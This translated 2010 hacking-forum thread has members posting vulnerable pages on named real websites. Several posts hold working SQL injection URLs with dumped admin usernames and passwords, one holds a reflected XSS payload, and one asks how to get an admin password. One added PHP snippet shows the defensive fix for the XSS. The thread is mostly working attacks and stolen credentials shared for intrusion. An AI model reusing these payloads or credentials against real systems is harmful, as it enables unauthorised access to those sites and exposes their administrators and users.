Post site bugs here

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, escalating privilege, exploitation, covering tracks and backdoors through to securing the web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discusses bugs, penetration, exploitation and techniques for securing websites and web servers. Include a PoC here so that members can learn from it

Post by nesta » Wed Feb 10, 2010 1:16 am

imagination is far more important than knowledge


Post by adit_coolz » Wed Feb 10, 2010 2:17 am

Code:

[+] URL:http://www.surfingqueensland.com.au/news.php?id=74+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 02:13:43
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: surf42ql_sq
	User: surf42ql_inam@localhost
	Version: 5.0.89-community
[+] Dumping data from database "surf42ql_sq" Table "admin"
[+] Column(s) ['admin_id', 'admin_name', 'admin_pwd', 'admin_email']
[+] Number of Rows: 2

[0] 1:sqwebadmin:check49mate:[email protected]:
[1] 2:schooladmin:gongmi79:[email protected]:[email protected]:
scidies is still learning, sorry if there are a lot of mistakes :kaca:


Post by adit_coolz » Wed Feb 10, 2010 2:38 am

Code:

[+] URL:http://www.duralee.com/trim/sku_treasure.php?Book_id=3+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:37:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: duralee_search
	User: [email protected]
	Version: 5.0.82-msl-usrs-sure2-log
[+] Dumping data from database "duralee_search" Table "Administrators"
[+] Column(s) ['user_id', 'username', 'user_password']
[+] Number of Rows: 3

[0] 60:ted:phpwork:
[1] 61:mark:phpwork:
[2] 62:duralee:duralee:duralee:
:devil


Post by turfa » Wed Feb 24, 2010 4:16 am

Add the admin page too, please


Post by peniru » Fri Feb 26, 2010 4:22 pm

Here's an XSS bug.. I don't know what to do with it... confused... :mati: :mati:

Code:

http://www.ivao.web.id/news.php?id=12&mid=%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E
.::. My Sign .::.
..noobie Pool..
Using tools or not isn't the issue; what matters is being able to understand what is being done
karma37.wordpress.com
koleksiomel.blogspot.co.id


Post by dark_superman » Fri Feb 26, 2010 8:29 pm

Which one is the bug in the post above?!!!! :circle:

Why just 'halo'?? Still confused!!! :putusasa:


Post by untouch » Fri Feb 26, 2010 9:57 pm

dark_superman wrote: Which one is the bug in the post above?!!!! :circle:

Why just 'halo'?? Still confused!!! :putusasa:

ha ha hey..
your post is funny too .. :omg:

attacks on web apps aren't carried out only through SQL, bro..


Post by peniru » Sat Feb 27, 2010 11:28 pm

dark_superman wrote: Which one is the bug in the post above?!!!! :circle:

Why just 'halo'?? Still confused!!! :putusasa:

http://www.ivao.web.id/news.php?id=12&m ... /script%3E

the bug:
%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E
or/
<script language="javascript">alert('isi dengan kata yang kamu mau')</script>
-----------------------------------------------------------------------------------------------------
Ideally it shouldn't be the word 'halo' that appears; it should be a warning or something like that... since I still don't understand how to inject using XSS, that's all I can show...
This is caused by the lack of a proper filtering process for the input variable...

if I'm not mistaken,, because I'm still a noob :circle: :circle:
.::. My Sign .::.
..noobie Pool..
Using tools or not isn't the issue; what matters is being able to understand what is being done
karma37.wordpress.com
koleksiomel.blogspot.co.id
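
The cause named in the post above (the input variable is written into the page without proper filtering), shown beside the corrected form. This is an added example, not part of the original thread and not the affected site's code; `render_unsafe()` and `render_safe()` are hypothetical names, and how the site actually uses `mid` is an assumption.

```php
<?php
// Added example, not code from the thread or from the affected site.
// Assumption: news.php writes the `mid` query parameter into the HTML response.
// render_unsafe() and render_safe() are hypothetical names for illustration.

// Vulnerable pattern: the parameter is concatenated into markup unchanged,
// so any tags it contains are parsed by the browser as part of the page.
function render_unsafe(array $query): string
{
    $mid = $query['mid'] ?? '';
    return '<p class="msg">' . $mid . '</p>';
}

// Hardened pattern: validate first, then encode for the HTML context on output.
function render_safe(array $query): string
{
    $mid = $query['mid'] ?? '';
    if (!is_string($mid) || strlen($mid) > 200) {
        $mid = '';   // arrays (mid[]=x) or oversized values are dropped
    }
    // ENT_QUOTES encodes both quote styles, so the value is also safe inside
    // a quoted attribute; ENT_SUBSTITUTE replaces invalid UTF-8 sequences.
    $encoded = htmlspecialchars($mid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="msg">' . $encoded . '</p>';
}

// The query string posted in the thread; parse_str() URL-decodes it the same
// way PHP fills $_GET.
$qs = 'id=12&mid=%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E';
parse_str($qs, $query);

echo render_unsafe($query), PHP_EOL;  // markup from the parameter reaches the page
echo render_safe($query), PHP_EOL;    // the same value arrives as inert text

// A Content-Security-Policy header is a second layer: with it, an inline
// <script> that slips through is not executed by the browser.
// header("Content-Security-Policy: default-src 'self'; script-src 'self'");
```

In the second line of output the `<`, `>`, `"` and `'` characters appear as HTML entities, so the browser displays the value as text instead of parsing it.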


Post by Zinthink » Mon Mar 01, 2010 11:40 am

blackxnovo wrote:

Code:

http://www.ambonekspres.com/index.php?act=rubrik&catid=-9+UNION+ALL+SELECT+1,2,concat_ws(0x3a,User,Password),4,5,6,7,8+from+user--


It's all complete, I just don't know where the admin login page is, hehehe, pleaaase help


Post by culun2000 » Tue Mar 02, 2010 7:32 am

Excuse me, handsome gentlemen, I'd like to ask something, please bear with a newbie: does this indicate a bug on a website? http://www.milim.com/news.php?id=100%27
If so, how do I go on from there to get the admin password, sir?
Please teach me SQL injection, sir. Bear with me, I'm new here.... :pusing: :pusing: :pusing:
